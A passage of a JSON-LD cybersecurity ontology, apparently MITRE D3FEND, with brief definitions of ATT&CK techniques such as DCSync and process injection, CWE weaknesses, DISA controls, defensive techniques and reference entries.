      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002359"
    },
    {
      "@id": "d3f:Reference-AccessPermissionModification_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-07-001/"
      },
      "d3f:kb-abstract": "Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemFileAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-07-001: Access Permission Modification",
      "rdfs:label": "Reference - CAR-2019-07-001: Access Permission Modification - MITRE"
    },
    {
      "@id": "d3f:LinuxUnlinkat",
      "@type": "owl:Class",
      "d3f:definition": "Delete a name and possibly the file it refers to. Different parameter handling than Linux Unlink",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/unlinkat.2.html"
      },
      "rdfs:label": "Linux Unlinkat",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIDeleteFile"
      }
    },
    {
      "@id": "d3f:TFTPServer",
      "@type": "owl:Class",
      "d3f:definition": "Trivial File Transfer Protocol (TFTP) is a simple file transfer protocol, typically used to automatically transfer configuration or boot files between machines.  It is used where user authentication and directory visibility are not required.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Trivial_File_Transfer_Protocol"
      },
      "rdfs:label": "TFTP Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:CWE-1045",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1045",
      "d3f:definition": "A parent class has a virtual destructor method, but the parent has a child class that does not have a virtual destructor.",
      "rdfs:label": "Parent Class with a Virtual Destructor and a Child Class without a Virtual Destructor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:T1003.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1003.006",
      "d3f:definition": "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.",
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "d3f:produces": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "rdfs:label": "DCSync",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:Nb1808c295bc54c85a62400727d7e5d6b"
        },
        {
          "@id": "_:Ne3e389f426cf4881b5aff68f23bc6c99"
        }
      ]
    },
    {
      "@id": "_:Nb1808c295bc54c85a62400727d7e5d6b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "_:Ne3e389f426cf4881b5aff68f23bc6c99",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:FileMagicByteVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileMagicByteVerification"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileMagicBytes"
      },
      "d3f:d3fend-id": "D3-FMBV",
      "d3f:definition": "Utilizing the magic number to verify the file",
      "d3f:kb-article": "## How it works\n\nMany file formats use magic numbers to identify a file format or protocol. Verifying that the magic number matches the expected value of its declared format is a simple way of verifying the file format.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CarvingContiguousandFragmentedFilesWithFastObjectValidation"
        },
        {
          "@id": "d3f:Reference-GatheringEvidenceModel-DrivenSoftwareEngineeringinAutomatedDigitalForensics"
        }
      ],
      "rdfs:label": "File Magic Byte Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileMetadataValueVerification"
        },
        {
          "@id": "_:Naa522e80c11e42d1af0930505e53e2aa"
        }
      ]
    },
    {
      "@id": "_:Naa522e80c11e42d1af0930505e53e2aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileMagicBytes"
      }
    },
    {
      "@id": "d3f:CWE-605",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-605",
      "d3f:definition": "When multiple sockets are allowed to bind to the same port, other services on that port may be stolen or spoofed.",
      "rdfs:label": "Multiple Binds to the Same Port",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-666"
        },
        {
          "@id": "d3f:CWE-675"
        }
      ]
    },
    {
      "@id": "d3f:T1481.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1481.001",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.",
      "rdfs:label": "Dead Drop Resolver - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1481"
      },
      "skos:prefLabel": "Dead Drop Resolver"
    },
    {
      "@id": "d3f:T1499.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1499.003",
      "d3f:definition": "Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)",
      "rdfs:label": "Application Exhaustion Flood",
      "rdfs:subClassOf": {
        "@id": "d3f:T1499"
      }
    },
    {
      "@id": "d3f:RankCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RC",
      "d3f:definition": "A rank correlation is any of several statistics that measure an ordinal association-the relationship between rankings of different ordinal variables or different rankings of the same variable, where a \"ranking\" is the assignment of the ordering labels \"first\", \"second\", \"third\", etc. to different observations of a particular variable.",
      "d3f:kb-article": "Wikipedia. (n.d.). Rank correlation. [Link](https://en.wikipedia.org/wiki/Rank_correlation)",
      "rdfs:label": "Rank Correlation",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "d3f:CWE-1313",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1313",
      "d3f:definition": "During runtime, the hardware allows for test or debug logic (feature) to be activated, which allows for changing the state of the hardware. This feature can alter the intended behavior of the system and allow for alteration and leakage of sensitive data by an adversary.",
      "rdfs:label": "Hardware Allows Activation of Test or Debug Logic at Runtime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CCI-001109_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system at managed interfaces denies network communications traffic by default and allows network communications traffic by exception (i.e., deny all, permit by exception).",
      "d3f:exactly": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001109"
    },
    {
      "@id": "d3f:WindowsRegistryKeyImportEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where registry key data is imported into the Windows Registry from an external source.",
      "rdfs:label": "Windows Registry Key Import Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WindowsRegistryKeyEvent"
      }
    },
    {
      "@id": "d3f:CCI-001632_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization protects nonlocal maintenance sessions by separating the maintenance session from other network sessions with the information system by either physically separated communications paths or logically separated communications paths based upon encryption.",
      "d3f:exactly": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001632"
    },
    {
      "@id": "d3f:T1637.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1637.001",
      "d3f:definition": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication   or malicious application distribution.(Citation: securelist rotexy 2018)",
      "rdfs:label": "Domain Generation Algorithms - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1637"
      },
      "skos:prefLabel": "Domain Generation Algorithms"
    },
    {
      "@id": "d3f:CryptographicKey",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In cryptography, a key is a piece of information (a parameter) that determines the functional output of a cryptographic algorithm. For encryption algorithms, a key specifies the transformation of plaintext into ciphertext, and vice versa for decryption algorithms. Keys also specify transformations in other cryptographic algorithms, such as digital signature schemes and message authentication codes.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Public-key_cryptography"
      },
      "rdfs:label": "Cryptographic Key",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:Variability",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-VAR",
      "d3f:definition": "Dispersion (also called variability, scatter, or spread) is the extent to which a distribution is stretched or squeezed. A measure of statistical dispersion is a nonnegative real number that is zero if all the data are the same and increases as the data become more diverse.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Statistical dispersion. [Link](https://en.wikipedia.org/wiki/Statistical_dispersion)",
      "rdfs:label": "Variability",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptiveStatistics"
      }
    },
    {
      "@id": "d3f:IPAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An Internet Protocol address (IP address) is a numerical label assigned to each device connected to a computer network that uses the Internet Protocol for communication.An IP address serves two main functions: host or network interface identification and location addressing. Internet Protocol version 4 (IPv4) defines an IP address as a 32-bit number. However, because of the growth of the Internet and the depletion of available IPv4 addresses, a new version of IP (IPv6), using 128 bits for the IP address, was standardized in 1998. IPv6 deployment has been ongoing since the mid-2000s.",
      "d3f:identifies": {
        "@id": "d3f:NetworkNode"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:IP_address"
      },
      "rdfs:label": "IP Address",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:N4d36f912e73b4734a32ff99e2280efa6"
        }
      ]
    },
    {
      "@id": "_:N4d36f912e73b4734a32ff99e2280efa6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "d3f:PowershellScriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Powershell Script File"
    },
    {
      "@id": "d3f:CWE-1303",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1303",
      "d3f:definition": "Hardware structures shared across execution contexts (e.g., caches and branch predictors) can violate the expected architecture isolation between contexts.",
      "rdfs:label": "Non-Transparent Sharing of Microarchitectural Resources",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1189"
        },
        {
          "@id": "d3f:CWE-203"
        }
      ]
    },
    {
      "@id": "d3f:CWE-256",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-256",
      "d3f:definition": "Storing a password in plaintext may result in a system compromise.",
      "rdfs:label": "Plaintext Storage of a Password",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:T1055",
      "@type": "owl:Class",
      "d3f:attack-id": "T1055",
      "d3f:definition": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.",
      "rdfs:label": "Process Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1074",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1074",
      "d3f:definition": "A class has an inheritance level that is too high, i.e., it has a large number of parent classes.",
      "rdfs:label": "Class with Excessively Deep Inheritance",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1093"
      }
    },
    {
      "@id": "d3f:CWE-621",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-621",
      "d3f:definition": "The product uses external input to determine the names of variables into which information is extracted, without verifying that the names of the specified variables are valid. This could cause the program to overwrite unintended variables.",
      "d3f:synonym": "Variable overwrite",
      "rdfs:label": "Variable Extraction Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-914"
      }
    },
    {
      "@id": "d3f:ApplicationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationHardening"
      ],
      "d3f:d3fend-id": "D3-AH",
      "d3f:definition": "Application Hardening makes an executable application more resilient to a class of exploits which either introduce new code or execute unwanted existing code. These techniques may be applied at compile-time or on an application binary.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "d3f:kb-article": "## Technique Overview\n\nExploits may, for example, rely on knowledge of addresses in a process's memory, they may alter memory contents, and they may cause a program to use instructions in a way that they were not intended.  By, for example, including code that dynamically changes the memory address of data or code on each run, introducing logic to validating the memory contents before certain potentially dangerous flows are executed, or monitoring a program for unusual sequence of instructions, this makes it harder for an attacker to craft a working exploit.",
      "d3f:synonym": "Process Hardening",
      "rdfs:label": "Application Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N4b37cfae6fa5484482879f6f183fe777"
        }
      ]
    },
    {
      "@id": "_:N4b37cfae6fa5484482879f6f183fe777",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "d3f:ScheduledJob",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contained-by": {
        "@id": "d3f:JobSchedule"
      },
      "d3f:created-by": {
        "@id": "d3f:JobSchedulerSoftware"
      },
      "d3f:definition": "A task scheduler process is an operating system process that executes scheduled tasks (time-scheduling in the sense of wall clock time; not operating system scheduling of processes for multitasking).",
      "d3f:modified-by": {
        "@id": "d3f:JobSchedulerSoftware"
      },
      "d3f:synonym": [
        "Scheduled Task",
        "Task Scheduler Process"
      ],
      "rdfs:label": "Scheduled Job",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Cron"
        },
        {
          "@id": "dbr:Windows_Task_Scheduler"
        },
        {
          "@id": "https://linux.die.net/man/1/at"
        },
        {
          "@id": "https://schema.ocsf.io/objects/job"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemProcess"
        },
        {
          "@id": "_:N0b5fa1bbf490447d8d79651ccb8c1363"
        },
        {
          "@id": "_:N0a5c81c7674c43dcb27b8cfa5ec25c9d"
        },
        {
          "@id": "_:Nd3815f94e03a4f8b8ef64e4215d9dd22"
        }
      ]
    },
    {
      "@id": "_:N0b5fa1bbf490447d8d79651ccb8c1363",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contained-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "_:N0a5c81c7674c43dcb27b8cfa5ec25c9d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:created-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedulerSoftware"
      }
    },
    {
      "@id": "_:Nd3815f94e03a4f8b8ef64e4215d9dd22",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modified-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedulerSoftware"
      }
    },
    {
      "@id": "d3f:Reference-WhatisHardwareWriteProtect",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.yokogawa.com/us/library/resources/faqs/pressure-what-is-hardware-write-protect/#:~:text=The%20hardware%20write%20protection%20is,Burn%20Out%20(BO)%20switch"
      },
      "d3f:kb-abstract": "Transmitters used in safety systems, environmentally sensitive applications, custody transfer, or critical processes need to be secure from tampering or inadvertent changes to their setup that may lead to errors and failures. Yokogawa’s pressure transmitters have the security of a Software Write Protection (Password) and a Hardware Write Protection (Switch) to secure programming changes and physical cover locks to secure the transmitter electronics. These security features can be applied independently or in combination to build the level of security desired.",
      "d3f:kb-author": "YOKOGAWA",
      "d3f:kb-reference-of": {
        "@id": "d3f:Hardware-basedWriteProtection"
      },
      "d3f:kb-reference-title": "What is Hardware Write Protect?",
      "rdfs:label": "Reference - What is Hardware Write Protect?"
    },
    {
      "@id": "d3f:PermissionRevokingEvent",
      "@type": "owl:Class",
      "d3f:definition": "An administrative event entailing the withdrawal of previously granted access rights, reconfiguring permissions to prevent a subject from performing specific actions on a resource, in accordance with updated access policies.",
      "rdfs:label": "Permission Revoking Event",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessControlAdministrationEvent"
      }
    },
    {
      "@id": "d3f:CWE-466",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-466",
      "d3f:definition": "A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference.",
      "rdfs:label": "Return of Pointer Value Outside of Expected Range",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:Reference-QualysNetworkPassiveSensorGettingStartedGuide",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.qualys.com/passive-scanning-sensor/"
      },
      "d3f:kb-abstract": "Qualys Passive Scanning Sensor (PS) continuously monitors all network traffic and flags any asset activity. It identifies and profiles devices the moment they connect to the network, including those difficult to scan, corporate owned, brought by employees, and rogue IT. The data is sent immediately to the Qualys Cloud Platform for centralized analysis.",
      "d3f:kb-organization": "Qualys",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:HardwareComponentInventory"
        },
        {
          "@id": "d3f:NetworkNodeInventory"
        }
      ],
      "d3f:kb-reference-title": "Qualys Network Passive Sensor Getting Started Guide",
      "rdfs:label": "Reference - Qualys Network Passive Sensor Getting Started Guide"
    },
    {
      "@id": "d3f:configures",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x configures y: The entity x sets the operational parameters of entity y, determining how y will operate.",
      "rdfs:label": "configures",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:T1150",
      "@type": "owl:Class",
      "d3f:attack-id": "T1150",
      "d3f:definition": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user's privileges).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.011",
      "rdfs:label": "Plist Modification",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:ATLASExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0005"
      },
      "rdfs:label": "Execution Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N347acda9ab3b4e0abf49930c04875ac8"
        }
      ],
      "skos:prefLabel": "Execution Technique"
    },
    {
      "@id": "_:N347acda9ab3b4e0abf49930c04875ac8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0005"
      }
    },
    {
      "@id": "d3f:T1565.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1565.001",
      "d3f:definition": "Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "d3f:modifies": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Stored Data Manipulation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1565"
        },
        {
          "@id": "_:N8342c0882e0841b89b1ad2ce981254e9"
        }
      ]
    },
    {
      "@id": "_:N8342c0882e0841b89b1ad2ce981254e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:OperationsCenterComputer",
      "@type": "owl:Class",
      "d3f:definition": "Mainframe computers or mainframes (colloquially referred to as \"big iron\") are computers used primarily by large organizations for critical applications; bulk data processing, such as census, industry and consumer statistics, and enterprise resource planning; and transaction processing. They are larger and have more processing power than some other classes of computers: minicomputers, servers, workstations, and personal computers.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Mainframe_computer"
      },
      "rdfs:label": "Operations Center Computer",
      "rdfs:seeAlso": {
        "@id": "dbr:Time-sharing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SharedComputer"
      },
      "skos:altLabel": "Mainframe"
    },
    {
      "@id": "d3f:T1184",
      "@type": "owl:Class",
      "d3f:attack-id": "T1184",
      "d3f:definition": "Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1563.001",
      "rdfs:label": "SSH Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1563.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:T1418",
      "@type": "owl:Class",
      "d3f:attack-id": "T1418",
      "d3f:definition": "Adversaries may attempt to get a listing of applications that are installed on a device. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempts specific actions.",
      "rdfs:label": "Software Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "Software Discovery"
    },
    {
      "@id": "d3f:CWE-680",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-680",
      "d3f:definition": "The product performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, leading to a buffer overflow.",
      "rdfs:label": "Integer Overflow to Buffer Overflow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "d3f:CWE-190"
        }
      ]
    },
    {
      "@id": "d3f:CWE-105",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-105",
      "d3f:definition": "The product has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation.",
      "rdfs:label": "Struts: Form Field Without Validator",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:TabletComputer",
      "@type": "owl:Class",
      "d3f:definition": "A tablet computer, commonly shortened to tablet, is a mobile device, typically with a mobile operating system and touchscreen display processing circuitry, and a rechargeable battery in a single, thin and flat package. Tablets, being computers, do what other personal computers do, but lack some input/output (I/O) abilities that others have. Modern tablets largely resemble modern smartphones, the only differences being that tablets are relatively larger than smartphones, with screens 7 inches (18 cm) or larger, measured diagonally, and may not support access to a cellular network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Tablet_computer"
      },
      "rdfs:label": "Tablet Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:PersonalComputer"
      },
      "skos:altLabel": "Tablet"
    },
    {
      "@id": "d3f:T1476",
      "@type": "owl:Class",
      "d3f:attack-id": "T1476",
      "d3f:definition": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Deliver Malicious App via Other Means - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Deliver Malicious App via Other Means"
    },
    {
      "@id": "d3f:Reference-PowershellExecution_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-04-003/"
      },
      "d3f:kb-abstract": "PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts.\n\nPowershell can be used to hide monitored command line execution such as:\n\n* net use\n* sc start",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-04-003: Powershell Execution",
      "rdfs:label": "Reference - CAR-2014-04-003: Powershell Execution - MITRE"
    },
    {
      "@id": "d3f:DS0006",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Credential material, such as session cookies or tokens, used to authenticate to web applications and services",
      "rdfs:comment": "This data source captures events relating to web credentials and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Web Credential (ATT&CK DS)"
    },
    {
      "@id": "d3f:may-interpret",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-interpret y: The entity x may interpret the thing y; that is, 'x interprets y' may be true.",
      "rdfs:label": "may-interpret",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:InitScript",
      "@type": "owl:Class",
      "d3f:definition": "An init script (or initialization script) is an executable script that initializes the an application, a process, or a service's state.  Examples include scripts run at boot by Unix or Windows, or those run to initialize a shell.",
      "rdfs:label": "Init Script",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Init"
        },
        {
          "@id": "https://blog.opstree.com/2020/02/11/shell-initialization-files/"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutableScript"
      },
      "skos:altLabel": "Initialization Script"
    },
    {
      "@id": "d3f:Cloud-basedDatabaseApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database application where the underlying infrastructure is managed by a third-party cloud provider. Examples include DynamoDB, Firestore, and CosmosDB.",
      "d3f:provider": {
        "@id": "d3f:CloudServiceProvider"
      },
      "d3f:synonym": "Serverless Database Application",
      "rdfs:label": "Cloud-based Database Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DatabaseServiceApplication"
        },
        {
          "@id": "_:N2f58a002547248beb29a3685ec6170d9"
        }
      ]
    },
    {
      "@id": "_:N2f58a002547248beb29a3685ec6170d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:provider"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudServiceProvider"
      }
    },
    {
      "@id": "d3f:AuthorizationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event reflecting the decision-making process and actions concerning access control, recording whether agents are permitted or denied access to resources based on pre-defined access control policies.",
      "rdfs:label": "Authorization Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/authorize_session"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N25fd8775748d412aa7c990f0937be8f9"
        },
        {
          "@id": "_:Nf7fb115f9a0049a28996bf8eeef23b5d"
        }
      ]
    },
    {
      "@id": "_:N25fd8775748d412aa7c990f0937be8f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
